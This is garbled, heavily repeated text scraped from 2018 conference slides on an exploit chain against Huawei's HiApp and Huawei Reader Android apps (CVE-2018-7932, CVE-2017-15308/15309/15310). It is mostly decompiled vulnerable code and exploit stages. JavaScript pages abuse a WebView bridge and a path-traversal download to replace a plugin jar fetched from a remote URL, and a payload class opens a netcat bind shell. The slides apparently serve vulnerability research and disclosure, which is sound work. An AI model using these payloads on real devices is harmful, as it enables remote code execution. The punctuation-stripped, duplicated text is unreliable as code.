1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 34: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 35: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 36: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 37: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 38: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

